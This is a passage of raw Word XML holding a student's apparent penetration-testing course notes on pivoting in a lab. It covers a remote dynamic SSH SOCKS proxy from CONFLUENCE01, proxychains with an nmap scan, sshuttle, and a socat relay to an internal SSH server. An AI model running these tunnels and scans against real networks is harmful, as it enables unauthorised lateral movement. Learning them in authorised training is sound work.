          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000912">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We pass in only one socket, the listening socket. And here, it's actually only one port (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9998</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), with no IP. This is because it defaults to loopback, which is what we want since this is the listening socket on our Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To bind the SOCKS proxy to port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9998 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">loopback interface </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of our Kali machine, we simply specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-R 9998</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the SSH command we run on CONFLUENCE01. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000914">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also pass the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag to prevent a shell from being opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the IP of our Kali </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000916">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000917">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Back on our Kali machine, we can check that port 9998 is bound by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000918">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="106" name="image104.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image104.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId192"/>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919">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SOCKS proxy port has been bound on both the IPv4 and IPv6 loopback interfaces on our Kali machine. We're ready to use it!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just as we did in the classic dynamic port forwarding example, we can use Proxychains to tunnel traffic over this SOCKS proxy port. We'll edit our Proxychains configuration file at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine to reflect our new local SOCKS proxy port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="393" name="image389.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image389.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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91D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 127.0.0.1 9998</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000920">
      <w:pPr>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t xml:space="preserve">Next, we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, targeting MULTISERVER03. This allows us to enumerate reachable services through the SOCKS proxy previously established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000922">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000923">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000924">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000925">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we have a SOCKS proxy, we are able to run the command is if we are CONFLUENCE01, which means we can specify the IP of our target machine (MULTISERVER03) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000926">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we can access multiple ports using dynamic port forwarding, we can do a full NMAP scan allowing us to look at multiple ports. Local and remote port forwarding can't do this. We don't have to specify a single port on the target since this command is being run by a machine (CONFLUENCE01) that can access all ports on target (MULTISERVER03) so we can use NMAP normally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000927">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000928">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5nltbfc7tz5a" w:id="80"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use sshuttle to make it seem like our Kali is in the same network as the machine that we are running shuttle against (the middleman). So then we can use the target's IP and port when as if though we were the middleman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we run the command, we can use the terminal normally. Whenever we try accessing the subnets specified in the sshuttle command, it will route to those subnets correctly instead of throwing an error, like it would without any tunneling. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in the example below, they actually used socat to extend the range of the port forward. They used socat to connect JUMP1 to JUMP2. And then we used sshuttle against JUMP1, which will forward packets to JUMP1, which gets forwarded to JUMP2, so JUMP2 will run the command, which is good since JUMP2 has direct access to target. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000930">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000931">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In situations where we have direct access to an SSH server, behind which is a more complex internal network, classic dynamic port forwarding might be difficult to manage.</w:t>
      </w:r>
      <w:hyperlink r:id="rId194">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId195">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sshuttle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that turns an SSH connection into something like a VPN by setting up local routes that force traffic through the SSH tunnel. However, it requires root privileges on the SSH client and Python3 on the SSH server, so it's not always the most lightweight option. In the appropriate scenario, however, it can be very useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000932">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our lab environment, we have SSH access to PGDATABASE01, which we can access through a port forward set up on CONFLUENCE01. Let's run sshuttle through this to observe its capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000933">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="506" name="image477.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image477.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1892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34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There was no diagram for the sshuttle section, but this is the closest one I can find. Ignore all the SSH stuff on this diagram. Basically, what sshuttle is trying to do in this section is connect from Kali to the HRSHARES machine, which is the machine on the far right. And it does this using socat and sshuttle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000936">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we can set up a port forward in a shell on CONFLUENCE01, listening on port 2222 on the WAN interface and forwarding to port 22 on PGDATABASE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000937">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000938">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
